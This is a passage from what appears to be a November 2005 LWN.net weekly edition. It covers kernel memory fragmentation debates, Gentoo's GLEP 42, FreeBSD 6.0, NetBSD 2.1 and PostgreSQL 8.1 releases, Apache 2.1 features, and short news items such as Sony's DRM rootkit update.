Traditionally, seq_open() has always allocated the seq_file structure itself. In 2.6.15, however, it will examine the private_data field first, and, if that field is non-NULL, it will assume that the seq_file has already been allocated by the caller. This change allows seq_file users to embed the structure within something larger. It is worth noting, though, that seq_release() still frees the seq_file structure regardless of who created it. Among other things, that implies that, if the caller allocates a seq_file structure within a larger structure, the seq_file structure must appear at the beginning.

Comments (none posted)

More on fragmentation avoidance

Last week's article on fragmentation avoidance concluded with these famous last words:

But there are legitimate reasons for wanting this capability in the kernel, and the issue is unlikely to go away. Unless somebody comes up with a better solution, it could be hard to keep Mel's patch out forever.

One thing which can keep a patch out of the kernel, however, is opposition from Linus, and that is what has happened in this case. His position is that fragmentation avoidance is "totally useless," and he concludes:

Don't do it. We've never done it, and we've been fine.

The right solution, according to Linus, is to create a special memory zone on the (rare) systems which need to be able to free up large, contiguous blocks of memory. Kernel memory allocations would not be allowed in that zone, so it would only contain user-space pages. Those pages are relatively easy to move when the need arises, so most needs would be satisfied. A certain amount of kernel tuning would be required, but that is the price to be paid for running highly-specialized applications.

This approach is not pleasing to everybody involved. Andi Kleen noted:

You have two choices if a workload runs out of the kernel allocatable pages. Either you spill into the reclaimable zone or you fail the allocation. The first means that the huge pages thing is unreliable, the second would mean that all the many problems of limited lowmem would be back.

Others have noted that it can be hard to tune a machine for all workloads, especially on systems with a large number of users. Objections notwithstanding, it begins to look like active fragmentation avoidance is not likely to go into the 2.6 kernel anytime soon.

Comments (none posted)

Patches and updates

Kernel trees

Core kernel code

Development tools

Device drivers

Filesystems and block I/O

Janitorial

Memory management

Networking

Architecture-specific

Security-related

Miscellaneous

Page editor: Jonathan Corbet

Distributions

News and Editorials

Gentoo Linux Enhancement Proposal #42

Gentoo Linux Enhancement Proposal (GLEP) #42 proposes a new way of informing Gentoo users about important updates and critical news. Although Gentoo already has several methods of informing their users of critical information, it is clear that many users are not getting the message. Instead, the mailing lists and forums get clogged with irate users who have failed updates and broken systems. A second draft of this GLEP proposes a solution that pushes the news items out to the user via the ``rsync`` tree.

An ideal solution would make sure that users are told of changes *before* they break the user's system, with no subscription or monitoring required. Notices should be relevant to the user receiving it. If a user gets every notice, including those specific to packages they don't have installed, they are more likely to miss something that they really did need to see. The solution should not require or assume that everyone has an MTA, web browser, email client, cron daemon or text processing suite available on their system and it should not require the user to give up private information. Multiple delivery methods should be supported so that each user has a choice in how to receive the information.

Ideally a method for supplying each message in multiple languages would be beneficial, and there should be quality control to insure that the messages are coherent, understandable, concise, and relevant.

The proposal favors the use of the Portage tree to disseminate this critical information. On the server side, the news items would reside in the repository under directories named 'yyyy-mm/' to make it easier to find new news. On the client side, an emerge command will copy or symlink the news file into /var/lib/gentoo/news/ and inform the user.

The proposal is still under discussion and some details of its implementation have not been addressed. Still this proposal makes a good start at solving some very real communications problems.

Comments (7 posted)

New Releases

FreeBSD Project Launches FreeBSD 6.0

The FreeBSD Foundation has announced the availability of FreeBSD 6.0. "One of the new features in FreeBSD 6.0 is a multithreaded file system, which greatly improves data access times for local disks, RAID configurations, network file systems, and SANs. Recent performance benchmarks show that FreeBSD 6.0 outperforms Linux in raw data throughput. Additionally, FreeBSD 6.0 extends support for wireless devices such as Intel Centrino and adds supports for the popular new WPA wireless security protocol." So much for the hyped up press release. This release announcement provides more useful information with less hype.

Comments (95 posted)

NetBSD 2.1

The NetBSD Project has announced the release of NetBSD 2.1. "NetBSD 2.1 is the first maintenance release of the netbsd-2 release branch. This release provides numerous functional enhancements, including support for many new devices, hundreds of bug fixes, patches and updates to kernel subsystems, and many enhancements to the user environment. In addition, all of the security fixes and critical bug fixes from the NetBSD 2.0.3 update are included as well."

Comments (none posted)

Distribution News

Fedora Core 5 test1 delayed

The Fedora schedule has slipped a couple of weeks. The major change created by modular X is the primary reason for the slip. (Click below for more on that.) The current schedule shows the Fedora Core 5 test 1 development freeze set for November 14, 2005, with a release of test 1 set for November 21.

Full Story (comments: none)

DebConf6

A Hot and Spicy DebConf6 has been scheduled for May 14 - 22, 2006, in Oaxtepec, Mexico. The conference is free for anyone who wants to attend. There are sponsorships available for those who need some financial assistance. The call for papers and presentations is open now. The deadline for proposals is December 6, 2005, 23h59 UTC.

Comments (none posted)

Bits from the Debian armeb port

Lennert Buytenhek reports that the armeb port is nearing a Sarge release. "For most packages, the vanilla debian sources are used. Some packages need patching for armeb, in which case we put the patched sources in a different component while we submit patches to the bug tracking system and wait for those to be merged. The armeb support patches for a number of packages have been merged already, and more will hopefully follow soon."

Full Story (comments: none)

Ubuntu Below Zero

Scott James Remnant has posted some of the specifications that were approved at UBZ. This In post looks at Ubuntu Express issues, LVM, media checks, booting from USB, automatic network detection and configuration, video playback, faster GNOME startup, Kubuntu 6.04 roadmap, and more.

A partitioning tool for Ubuntu Express leads the second post, along with Live CD performance improvements, Unionfs support in the live CD, support for OpenLDAP and Active Directory, hiding admin tools from non-sudoers, audio improvements, Rhythmbox iPod integration, and best bug handling practices.

Comments (none posted)

Oldenburg DevJam meeting

The Oldenburg DevJam hosted a Debian Java Meeting, held in Oldenburg, Germany last September. Here's a report from that meeting. "At DevJam several Java people from different distributions meet for the first time. This way there was the possibility to talk about how the different distributions currently handle java packages. Furthermore there are several discussions how the distributions can join efforts in their task of maintaining java packages."

Full Story (comments: none)

New Distributions

Arudius

Arudius is a live CD Linux distribution based on Minislack and Linux Live scripts. It contains an extensive set of software tools used by IT security professionals for penetration testing and vulnerability analysis. Its goal is to include the most complete set of useful security tools and still maintain a small footprint. Version 0.1 was released November 4, 2005.

Comments (1 posted)

Distribution Newsletters

Debian Weekly News

The Debian Weekly News for November 8, 2005 covers problems (and solutions) for KDE packages in testing, is Debian participating in the GPLv3 process?, a Linux-Info-Tag Dresden event report, the Debian GNU/kFreeBSD Live CD, how to create SSL certificates on Debian, Debconf6 call for papers, Debian at Systems Exhibition, and several other topics.

Full Story (comments: none)

Fedora Weekly News Issue 21

This week's edition of the Fedora Weekly News covers a Vote against software patents in an Internet poll, the Livna Repo Availability Issue, a Using Rawhide and Fedora Testing Guide, Kennards shifts 400 desktops to Linux (Fedora), Fedora Extras Steering Committee Meeting and more.

Comments (none posted)

Gentoo Weekly Newsletter

The Gentoo Weekly Newsletter for the week of November 7, 2005 looks at how GLEP aims to manage important update information, an interview with Jacob Lindberg at Brenntag Nordic, GeCHI conference in Italy, and much more.

Comments (none posted)

DistroWatch Weekly

The DistroWatch Weekly for November 7, 2005 is out. "As expected, the three main BSD releases stole the limelight of most open source news sites last week, with especially FreeBSD 6.0 looking like a truly excellent product. We will take a closer look at some of the issues discussed on the FreeBSD mailing lists shortly after the release and share our experiences with upgrading the DistroWatch server. Also in this issue: a comment on the events of the past week affecting SUSE Linux and Kubuntu, and a link to an interesting sub-project by Linux From Scratch - for the fans of cross-compiling. Our featured distribution of the week is the OpenSolaris-based BeleniX live CD, while the amaroK project is the one that gets our US$300 October 2005 donation."

Comments (none posted)

Package updates

Fedora updates

Fedora Core 4 updates: eclipse (Eclipse 3.1.1 natively-compiled for FC4), eclipse-cdt (build 3.0.0 for FC4), x86info (update to 1.17), wireless-tools (update to wireless-tools 28pre10), NetworkManager (rebuild for FC4), tar (bug fix), openldap (merge changes from rawhide and upgrade to 2.2.29), lm_sensors (fixed pwmconfig patch), kudzu (backport corrected kernel version handling), hwdata (add migration for mptfusion), hwdata (fix typo in PCMCIA config file), audit (enhancements).

Fedora Core 3 updates: evolution (bug fix), lm_sensors (fixed pwmconfig patch), glibc (update to glibc 2.3.6 release).

Comments (none posted)

Mandriva update

Mandriva update MDKA-2005:049 provides updated mandriva-release packages with a fixed CREDITS file. Click below for the complete advisory.

Full Story (comments: none)

Slackware updates

Slackware Linux received several security and bug fixes this week. Security fixes are available for several versions Slackware and the advisories can be found on this week's Security page. Details can always be found in the slackware-current changelog.

Comments (none posted)

Distribution reviews

OpenLab: The other African distribution (LinuxOnline)

Linux Online reviews OpenLab 4. "Some articles I had read about OpenLab mentioned that it would run fairly well on older hardware, so I trotted out my trusty old AMD K6 II and gave it a try. When you plunk the CD in the drive and boot, start up is really fast, so it would seem it doesn't disagree with my aging hardware. Also, I have often had problems with other distributions with this machine. It has something to do with the video card and frame buffer problems, but with OpenLab, I didn't have any problems. What I did miss, at this point, was the possibility to get support for my Spanish keyboard layout. Typing 'lang=es' at the boot prompt usually does the trick, but this did nothing here. Actually, this is no big deal, since OpenLab boots into KDE and you can change this very easily by just clicking on the US flag in the taskbar."

Comments (none posted)

Introducing GoboLinux 012 (NewsForge)

Linux.com looks at GoboLinux 012. "Contrary to most Linux distributions, GoboLinux chooses not to follow the Free Standards Group's Filesystem Hierarchy Standard. Gobo's authors thought the traditional Unix directory tree was unsuitable for a modern desktop Linux distribution and decided to take the path that another desktop-oriented operating systems has been following for years -- namely, Mac OS X."

Comments (none posted)

Page editor: Rebecca Sobol

Development

A Look at the Apache 2.1 Web Server

The Apache web server is one of the largest and most important open-source projects in use today. It is the most commonly used web server on the internet, and has been around since 1995. The project history document provides some useful background information. Apache is such a large project that it requires a glossary to keep track of the terminology used by the project.

[Apache] Version 2 of Apache was created several years ago as an effort to improve and restructure the popular web server, which had become somewhat overloaded with features and modifications. The current stable release of Apache is version 2.0.55. Work on the next stable release, version 2.2, is ongoing, with the unstable 2.1 series.

Development version 2.1.9-beta of Apache was announced on November 6, 2005. The main Apache web site summarizes the release: "This version of Apache is a Beta release of the unstable development branch. New features include Smart Filtering, Improved Caching, AJP Proxy, Proxy Load Balancing, Graceful Shutdown support, Large File Support, the Event MPM, and refactored Authentication/Authorization."

The new features in Apache 2.2 document lists the changes in detail, here's a quick rundown of what's new:

  • Refactoring of the authentication and authorization modules.
  • Improvements to the caching system.
  • A simplified and improved configuration system with easy to use configuration snippets.
  • Improvements to the shutdown process for httpd.
  • A new_mod_proxy balancer module for load balancing.
  • Inclusion of version 5 of the Perl Compatible Regular Expression Library.
  • Improvements to the output filtering system via mod_filter.
  • Support for files and request bodies larger than 2GB.
  • An experimental Event MPM for improving atomic operations.
  • Support for SQL databases via mod_dbd.
  • Improvements to the mod_authnz_ldap, mod_info, and mod_ssl modules.
  • An httpd -M command line option that lists all loaded modules.
  • Modules now use version 1.0 of the Apache Portable Runtime API.
The Apache 2.1.9 change list shows the bug fixes and other modifications that have been made for this release. For a complete manual, take a look at the Apache version 2.1 documentation.

The Upgrading to 2.1 from 2.0 document is worth a quick read before upgrading. All current versions of Apache are available for download here.

Comments (1 posted)

System Applications

Database Software

PostgreSQL 8.1 Released

PostgreSQL 8.1 is out. This release includes database roles, two-phase commit support, and an impressive set of performance improvements; click below for the full announcement.

Full Story (comments: 6)

Mogwai ERDesigner 0.9.5 released (SourceForge)

Version 0.9.5 of Mogwai ERDesigner is available. "ERDesigner is a free entity releationship modelling tool supporting MySQL, PostgreSQL and Oracle. There are also several plugins available for model documentation, source code generation for JPOX and Hibernate for your models. Also the tools supports database schema versioning. The 0.9.5 release includes some bug - fixes and also enhancements to the reverse engineering plugin and code generation module."

Comments (none posted)

PostgreSQL Weekly News

The November 6, 2005 edition of the PostgreSQL Weekly News is online with the latest PostgreSQL database information.

Full Story (comments: none)

SchemaSpy 2.0.0 released (SourceForge)

Version 2.0.0 of SchemaSpy is out with a number of new capabilities. "SchemaSpy analyzes schema metadata, letting you click through the hierarchy of your tables' parent/child relationships either graphically or through HTML tables. It works with just about any RDBMS given an appropriate JDBC driver. SchemaSpy also identifies several common schema anomalies."

Comments (none posted)

Embedded Systems

Busybox 1.1.0-pre1 released

Version 1.1.0-pre1 of Busybox, a condensed collection of command line tools for embedded systems, is out. "This prerelease includes a lot of new functionality: new applets, new features, and extensive rewrites of several existing applets. This prerelease should be noticeably more standards compliant than earlier versions of busybox, although we're still working out the bugs."

Comments (none posted)

Networking Tools

iptables 1.3.4 released

Version 1.3.4 of the iptables network filtering software has been released. "The 1.3.4 version contains accumulated bugfixes to the last 1.3.3 version. It also fixes some compilation problems with the latest (2.6.14) kernel release."

Full Story (comments: none)

Package Management

Red Hat RPM Guide released

Red Hat has released a new, extensive guide to the RPM package manager under the Open Publication License. It probably belongs in the bookmarks of anybody who manages an RPM-based system.

Comments (4 posted)

Security

TrueCrypt 4.0 Released (SourceForge)

Version 4.0 of TrueCrypt, a cross-platform disk encryption system, is available. "Among the new features is the ability to mount TrueCrypt volumes on Linux (TrueCrypt has been ported to Linux), ability to write to outer volume without risking that a hidden volume within it will get damaged, support for x86-64 (64-bit) and big-endian hardware platforms, support for Windows XP x64 Edition (64-bit) and Windows Server 2003 x64, full support for keyfiles, language packs, network drives, auto-dismount, hot keys, and many more."

Comments (2 posted)

Web Site Development

MKSearch beta 1, done with GCJ

The first beta release of MKSearch has been announced. "MKSearch is a metadata search engine that indexes structured metadata in Web documents, not free text in the document body."

Full Story (comments: none)

mnoGoSearch 3.2.35 released

Version 3.2.35 of mnoGoSearch, a web site search engine, is available. See the change history document for details.

Comments (none posted)

Wicket 1.1 released (SourceForge)

Version 1.1 of Wicket, a Java component oriented web application framework, has been announced. A large collection of new features has been added.

Comments (none posted)

Xaraya 1.0 is here! (SourceForge)

Version 1.0 of Xaraya, a PHP-based web application framework, has been announced. "This release marks the end of the road to 1.0 and presents a secure and stable platform on which to build into the future. Many smaller fixes to the code are included and some template inconsistencies have been removed."

Comments (none posted)

Google Sitemaps (O'Reilly)

Uche Ogbuji explores Google Sitemaps on O'Reilly. "I wrote the Python-XML column for three years, discussing the combination of an agile programming language with an agile data format. It's time to pull the lens back a bit to take in other such technologies. This new column, "Agile Web," will cover the intersection of dynamic programming languages and web technologies, particularly the sorts of dynamic developments on the web for which some use the moniker, "Web 2.0.""

Comments (none posted)

Miscellaneous

Eddie 0.35 has been released

Version 0.35 of the EDDIE Tool, a Pyhon-based tool for system monitoring, security and performance analysis, is available. "This version has been a long time coming but check out all the added features, including support for two new platforms."

Comments (none posted)

Desktop Applications

Audio Applications

LDAS 0.1.0 Released

The initial release (version 0.1.0) of LDAS, the Low Delay Audio Streamer, is available. "At this point, the basic functionality is present -- LDAS is capable of transmitting full duplex two-channel audio between two computers. This has been tested using the ldas_mate binary running on two computers equipped with SoundBlaster Live sound cards."

Full Story (comments: none)

Rivendell v0.9.57 announced

Version 0.9.57 of the Rivendell radio automation system has been announced. Changes include SuSE desktop integration, new icons, and bug fixes.

Full Story (comments: none)

Business Applications

Sequoia ERP v0.8.2 RC1 released (SourceForge)

Version 0.8.2 RC1 of Sequoia ERP, a business Enterprise Resource and Planning application, has been announced. "The first candidate for Sequoia ERP v 0.8.2 has been released. This release candidate incorporates some incremental enhancements and bug fixes since the 0.8.1-stable release."

Comments (none posted)

Tina POS 0.0.12 released (SourceForge)

Version 0.0.12 of Tina POS has been released with several new features and bug fixes. "Tina POS is a point of sales application designed for touch screens. Supports ESC/POS ticket printers, customer displays and barcode scanners. Its multiuser and has a great backoffice with a product entry form, reports and charts."

Comments (none posted)

Calendar Software

WebCalendar 1.1 development update (SourceForge)

A development version of WebCalendar 1.1 is available with an important security fix. "WebCalendar is a PHP-based calendar application that can be configured as a single-user calendar, a multi-user calendar for groups of users, or as an event calendar viewable by visitors. MySQL, PostgreSQL, Oracle, DB2, Interbase, MS SQL Server, or ODBC is required."

Comments (none posted)

Desktop Environments

GNOME Foundation board size referendum passes

The GNOME Foundation vote on the reduction of its board of directors from eleven to seven members was covered in LWN two weeks ago. The results are now in, and the issue has passed; there were 117 "yes" votes to 70 "no" votes.

Full Story (comments: none)

GNOME Software Announcements

The following new GNOME software has been announced this week: You can find more new GNOME software releases at gnomefiles.org.

Comments (none posted)

KDE Software Announcements

The following new KDE software has been announced this week: You can find more new KDE software releases at kde-apps.org.

Comments (none posted)

Electronics

Electric 8.03 released

Version 8.03 of Electric has been announced. "The Electric VLSI Design System is a framework for all computer-aided design and engineering work. The system understands MOS, Bipolar, schematics, printed circuitry, artwork, and many others. In addition, Electric contains design-rule checkers, simulators, generators (PLA, etc.), routers, a VHDL compiler, a compactor, network comparison, and other tools. Interpretive languages can be built-in (currently LISP and TCL are available). Current versions of Electric have been rewritten from C to Java." See the project page for download information.

Comments (none posted)

wcalc 0.9 has been released

Version 0.9 of wcalc, a tool for the analysis and synthesis of transmission line structures, is available. "After 8 years in development and use among a fairly small group of people, I am pleased to announce that the first public release of wcalc is finally available. While wcalc is believed to be stable at this time, it has not received much field testing. Therefore I decided on calling this version 0.9. My intention is to collect feedback from users over the next few months and then make a 1.0 release after wcalc has seen some more widespread use."

Comments (none posted)

Interoperability

Wine Weekly News

The November 4, 2005 edition of the Wine Weekly News is available. Topics include: Another Beta Article, WineProbe - Part II, Multimonitor Support, Multiple App Support, Killing Wine Processes, Wine Eject, Linking Windows Libraries.

Comments (none posted)

Mail Clients

Mozilla Thunderbird 1.5 Release Candidate 1 Available (MozillaZine)

Release candidate 1 for version 1.5 of the Mozilla Thunderbird email client is out. "Mozilla Thunderbird 1.5 Release Candidate 1 is intended to allow testers to ensure that there are no last-minute problems with the Thunderbird 1.5 code. There will be at least one more release candidate before the final launch of 1.5. In addition to fixing several bugs that came out of the Beta 2 testing cycle, 1.5 RC1 also includes support for saved search folders that can search across multiple accounts and support for message threads for single folder saved search folders."

Comments (none posted)

Medical Applications

FreeMED 0.8.1 Released (LinuxMedNews)

Version 0.8.1 of the FreeMED medical practice management system has been announced. "New features include: Integrated PEAR and phpwebtools for ease of installation, New Quest Diagnostics HL7 lab interface for integrated results, Support for FQHC sliding scale system, Secure data warehousing architecture added, Initial French internationalization/translation added, Improved query maker support, Support for labs and results, New pluggable authentication system, and Improved messaging system."

Comments (none posted)

Music Applications

gmorgan 0.25 released

Version 0.25 of gmorgan, a rhythm station and organ synthesizer, is out with bug fixes, new features, and availability as a Debian package.

Full Story (comments: none)

Musical MIDI Accompaniment 0.18 now available

Beta release 0.18 of MMA, the Musical MIDI Accompaniment generator, is out. "Included in this release: Enhancements to lyrics, macros, command line macro define, various bug fixes, and minor syntax changes."

Full Story (comments: none)

Video Applications

xjadeo 0.1.1 announced

Version 0.1.1 of Xjadeo is out with build improvements, better documentation, and some new command line options. "Xjadeo is intented as a tool for composing soundtracks to video clips and is designed to use little system resources, even at the expense of video playing quality."

Full Story (comments: none)

Web Browsers

MPlayerplug-in 3.15 released

Version 3.14 of MPlayerplug-in, A Mozilla compatible plugin that plays online video, is out. Changes include the ability to seek by clicking on the progress bar, improvements to the Apple HD Trailer playback, and additional JavaScript Events.

Comments (none posted)

Miscellaneous

Comix 1.5 released (SourceForge)

Version 1.5 of Comix, a GTK+ comic book viewer, is available. "With version 1.5 Comix takes a few more steps towards it's goal of being user-friendly and simple but still powerful and without taking the control away from the user."

Comments (none posted)

Languages and Tools

Caml

Caml Weekly News

The November 8, 2005 edition of the Caml Weekly News is online with the latest Caml language articles.

Full Story (comments: none)

Java

GNU Classpath 0.19 released

Version 0.19 of GNU Classpath, a set of essential Java libraries, is out. Here are the release highlights: "Much more efficient painting for large Free Swing GUIs. Improved accessibility support. HttpURLConnection rewrite. Official CORBA VMCID assigned. Start of RMI over IIOP support. Qt4 support for OS-X. Much improved Free Swing Metal theme. Free Swing Demo includes theme switcher example (Metal, Ocean, GNU). JBoss now starts up and Jonas testsuite passes for 95%. Support for the javax.sound.midi framework and experimental DSSI and ALSA service providers. Early version of the popular StAX API. Now has 96% coverage of 1.4 API."

Full Story (comments: none)

The Unofficial "Harmony, Licensing, the Universe and everything" FAQ

Leo Simons presents a new document: "The Unofficial "Harmony, Licensing, the Universe and everything" FAQ". Take a look for answers to all of your licensing questions about Harmony, an open-source Java implementation.

Full Story (comments: none)

JSP

What Is Struts

Chuck Cavaness introduces Struts on O'Reilly. "Apache Struts is an open source Java framework used for building web applications based on the servlet and JavaServer Pages (JSP) technologies. It was created in 2000 by Craig R. McClanahan and has become the de facto standard framework for web applications in Java."

Comments (none posted)

Python

Dr. Dobb's Python-URL!

The November 6, 2005 edition of Dr. Dobb's Python-URL! is online. Take a look for new Python language articles.

Full Story (comments: none)

Dr. Dobb's Python-URL!

The November 9, 2005 edition of Dr. Dobb's Python-URL! is online with the latest Python articles and resources.

Full Story (comments: none)

Ruby

Ruby Weekly News

The November 6th, 2005 edition of the Ruby Weekly News looks at the latest discussions from the ruby-talk mailing list.

Comments (none posted)

Tcl/Tk

Dr. Dobb's Tcl-URL!

The November 2, 2005 edition of Dr. Dobb's Tcl-URL! is online with new Tcl/Tk articles and resources.

Full Story (comments: none)

Dr. Dobb's Tcl-URL!

The November 7, 2005 edition of Dr. Dobb's Tcl-URL! is online with the latest Tcl/Tk news and resources.

Full Story (comments: none)

IDEs

eric3 3.8.0 released

Version 3.8.0 of eric3, an IDE for Python and Ruby, has been announced. Changes include usability enhancements and bug fixes.

Comments (none posted)

Miscellaneous

Scriptorium code library 1.6 released (SourceForge)

Version 1.6 of Scriptorium has been announced. "Scriptorium is a web-based code library that helps you reuse code you've already written by organizing it in one place, regardless of language. New in version 1.6 are localization support (French and Dutch language translations so far), the ability to attach comments to your snippets, and a new syntax highlighting engine. Plus the usual smattering of interface improvements and bug fixes."

Comments (none posted)

XPlanner 0.7 beta 2 released (SourceForge)

Version 0.7 beta 2 of XPlanner is available. "XPlanner is a web-based project planning and tracking tool for eXtreme Programming (XP) teams. XPlanner is implemented using Java, JSP, and Struts, and MySQL (user contributed support for other databases). XPlanner 0.7 provide many improvements."

Comments (none posted)

Page editor: Forrest Cook

Linux in the news

Recommended Reading

Getting to know the new Linux-based Nokia 770 'handlet' (Linux Journal)

Linux Journal takes a look at the new Nokia 770 (Linux-based) tablet. "My min-report: it's very cool. Basically, it's a browser with lots of extra features. The wide 800 x 480 screen is pretty and very sharp. That resolution in a palm-sized device (5.5" x 3.1" x 0.7" with a 4.3" screen) means looking at itty-bitty (but very sharp) type, which is a strain for my old eyes. But fortunately the 770 comes with two ways (one involving a nice big rocker switch with a + and a -) to zoom the display, and another button for making the browser window full-screen."

Comments (4 posted)

More MA Shenanigans (Groklaw)

Groklaw follows the latest news in Massachusetts' attempts at adopting the Open Document Format: "According to what I've just learned, an amendment to a piece of important Massachusetts legislation (an economic stimulus bill) was passed out of the Senate Ways & Means committee this afternoon. If it is adopted, it could at minimum drastically delay the effectiveness date of the ODF policy, and at worst, could roll back the Information and Technology Division's (ITD) action entirely. I can't confirm at this time the identity of the amendment's proponents, but I am told that the amendment will be debated in the State Senate on Thursday, so those who are behind the amendment will become visible at that point. The gist of the amendment would be to create a new four-person "task force" that would have the power to approve or block a wide variety of IT policy decisions in the Commonwealth -- and many provisions of the amendment map specifically to the ODF situation. . . ."

Comments (28 posted)

Trade Shows and Conferences

OSBC proves open source and business go together (NewsForge)

NewsForge reports on the first "east coast" Open Source Business Conference (OSBC), held in Newton, Massachusetts last week. "Conference attendees weren't there to learn about open source in the "What is this phenomenon?" sense but to learn better ways their businesses could profit or cut costs by using it. One thought I heard from several people was that we are seeing the start of an open source investment mini-bubble, and it's true that there were venture capitalists around, sniffing out potential deals with nascent companies. The VC presence wasn't as strong as it was at the Web 2.0 Conference in October, but it was stronger than I've seen it at any other IT-oriented conference since 2000."

Comments (none posted)

Trolltech Developer Days in Munich (KDE.News)

KDE.News covers the second annual Trolltech Developer Days. "Trolltech continues to grow at an impressive rate, they increased their staff from 80 to 140 employees in the last twelve months. A second round of fundraising, which brought $6.7 million of disposable money to the company, was recently completed. Trolltech has opened an office in China. And of course the long awaited Qt 4 was released. In the coming twelve months Trolltech will become a professional service organisation. They will develop new products that complement and expand the usage of Qt. A continued focus on making Qt easier to use, faster, leaner and better will be kept and it is expected that Qtopia will explode in the phone market."

Comments (none posted)

Companies

Google gives back to Oregon universities (NewsForge)

NewsForge reports on Google donations to two universities in Oregon. "Google, having gotten where it is thanks in large part to open source software and development, is giving back to the community with a $350,000 grant to Oregon State and Portland State universities for their collaboration on the development, systems administration, and learning of open source software. Google was impressed with the efforts at the two Oregon schools, which are home to one of the premier open source education facilities and some of the industry's most advanced curricula, according to Google Open Source Program Manager Chris DiBona. He said that Google figured if the colleges' efforts were fruitful on their existing, limited budgets, a cash infusion would likely spur even more progress faster."

Comments (none posted)

Felten on Sony's rootkit update

As has been reported in a few places, SonyBMG and First4Internet have released a software update which is supposed to clear a system of the rootkit-like DRM they were caught shipping on CDs. Ed Felten is skeptical: "The update is more than 3.5 megabytes in size, and it appears to contain new versions of almost all the files included in the initial installation of the entire DRM system, as well as creating some new files. In short, they're not just taking away the rootkit-like function -- they're almost certainly adding things to the system as well. And once again, they're not disclosing what they're doing."

Comments (21 posted)

Linux Adoption

Linux in Italian Schools, Part 4: Progetto 'Mottabit' (Linux Journal)

Marco Fioretti reports on the use of free software in elementary schools in Motta di Costabissara, Italy. "A recent official report on FOSS in Italy says, among other things, "[the standard usage] of Free Software can be reproduced in elementary schools only with difficulty". Luckily, says Italian Linux activist Antonio Bernardi, "Nobody in Costabissara had read that report, and we hope they never do.""

Comments (3 posted)

Linux at Work

It's unofficial: Microsoft bets business on Linux (Computerworld)

Microsoft plans to deploy some Linux-based networking equipment, according to Computerworld. "Aruba Networks was selected to provide the networking equipment for what is considered to be one of the world's largest next-generation wireless LANs, serving more than 25,000 simultaneous users a day in some 60 countries. According to an Aruba press statement, Microsoft's new WLAN will be deployed in 277 buildings covering more than 17 million square feet using Aruba mobility controllers, mobility software and some 5000 wireless access points. What the press statement didn't mention is that Aruba mobility controllers run the Linux operating system which Microsoft has aggressively targeted as being inferior to Windows as part of its "Get the Facts" marketing campaign." (Thanks to Frankie D.)

Comments (21 posted)

Linux Answers Phone Makers' Call (BusinessWeek)

Here's a lengthy Business Week article on the use of Linux in cellular phones. "'The open-source community is allowing us to take some thought leadership to influence the road map,' [Motorola manager Greg] Besio says. 'That doesn't happen with Microsoft.' He declines to state exactly what percentage of Motorola phones will eventually run on Linux. According to Gartner, the company has indicated that percentage could get as high as 80%."

Comments (none posted)

Legal

Moglen: open-source risks overblown (ZDNet)

ZDNet covers a recent speech by FSF counsel Eben Moglen. ""The secret of the GPL was taking a small quantum of risk and putting it on the distributors," Moglen said. "The total risk could be brought close to zero. By contrast, the patent system still imposes risk on users of open-source software, a situation that that shows little chance of changing, he said. In particular, Moglen said that pharmaceutical companies, which have great political influence, will prevent significant reforms to the patent system."

Comments (none posted)

The Copyright Chaos of Google Print (eWeek)

eWeek wonders if Google Print breaks copyright laws or follows the fair-use principle. "If Google Print is allowed to proceed, the litigants foresee a world of copyright chaos, where people will freely steal material and authors will no longer be paid, destroying the very fabric of society. This is obviously an extreme view, one that fails to see the opportunity that an index of more than 20 million books can offer. Rather than be hurt, book sales may increase due to their exposure in the index. In fact, such an index may even revive long-forgotten or out-of-print texts."

Comments (20 posted)

Interviews

Sebastian Kuegler (People Behind KDE)

The People Behind KDE have an interview with Sebastian Kügler. "Profession: I'm doing research at the Radboud University of Nijmegen in the Netherlands on a European Software Quality standard. In a second project I'm working on for a living, I'm building a digital schoolyard to motivate secondary education students to become Open Source software developers." (Found on KDE.News)

Comments (none posted)

Interview: Bob Young after Red Hat (NewsForge)

NewsForge talks with Bob Young about life after Red Hat. "How did Young make the leap from Linux to self-publishing? Lulu.com actually has its roots in the short-lived Center for the Public Domain (CPD), a non-profit Young founded with Mark Ewing in 1999. The CPD's mission was to help combat the expansion of intellectual property laws that were, as Young put it, "the biggest single threat to the open source movement.""

Comments (none posted)

Resources

Linux Gazette #120

The November 2005 Linux Gazette is out. This relatively thin issue includes articles on playing with an iPod, building a Linux-based answering machine, gcc, and more.

Comments (2 posted)

The Open Source WRT54G Story (Wi-Fi Planet)

Wi-Fi Planet has put up a tutorial on alternative firmware for the Linux-based Linksys WRT54G router. "With the code in hand, developers learned exactly how to talk to the hardware inside and how to code any features the hardware could support. It has spawn[ed] a handful of open source firmware projects for the WRT54G that extend its capabilities, and reliability, far beyond what is expected from a cheap consumer-grade router."

Comments (5 posted)

Reviews

MapFS makes its debut (NewsForge)

NewsForge covers MapFS. "Designed to simplify the interaction and use of a Linux network, the MapFS module specifically offers "optimistic copy and write capabilities," allowing users to share a single virtual file system that appears to be read-only, but allows users to save changes to files by writing changes to their own systems rather than the original files."

Comments (4 posted)

A Beginning Look At MythTV (Linux Journal)

Linux Journal takes a look at MythTV. "MythTV is a software package that lets you turn your Linux-based computer into a television and personal video recorder (PVR) by recording shows onto the hard disk. MythTV lets you select the TV shows you want to record by using an on-screen menu, pointing and clicking your way way through a schedule by show name or time."

Comments (2 posted)

Linux thumbnail viewers (Linux.com)

Linux.com takes a look at thumbnail viewers. "Thumbnail viewers are utilities that let you quickly view or manipulate images. For instance, many let you display, rotate, and zoom images. Some also offer built-in slide show features -- though not at the level of presentation programs such as OpenOffice.org Impress. Here's an introduction to several common Linux thumbnail viewer programs."

Comments (7 posted)

What Is TurboGears (O'ReillyNet)

The O'Reilly Network introduces TurboGears and includes an interview with its author. "But I think there's a real shift happening in corporate America right now with regard to enterprise-level development. They're finally realizing that they don't have to do things that take thousands of lines of XML configuration and tens of thousands of lines of code when they can rely on smaller and more agile frameworks that are just as capable for the common case -- frameworks like Rails and TurboGears."

Comments (3 posted)

Miscellaneous

Formation of KDE Marketing Working Group (KDE.News)

KDE.News covers the creation of the new KDE Marketing Working Group. "The KDE Marketing Working Group has formed, after being proposed by the KDE community at aKademy 2005, with the aim of improving KDE's marketing and promotion efforts. Martijn Klingens, Sebastian Kügler and Wade Olson will be taking the lead in coordinating and implementing new practices, such as promoting releases more widely and running more exciting events booths. An initial charter has been created and approved by KDE e.V with the long-term goal of "coherent and strategic messaging around KDE"."

Comments (none posted)

Linux Standard Base approved as international standard (NewsForge)

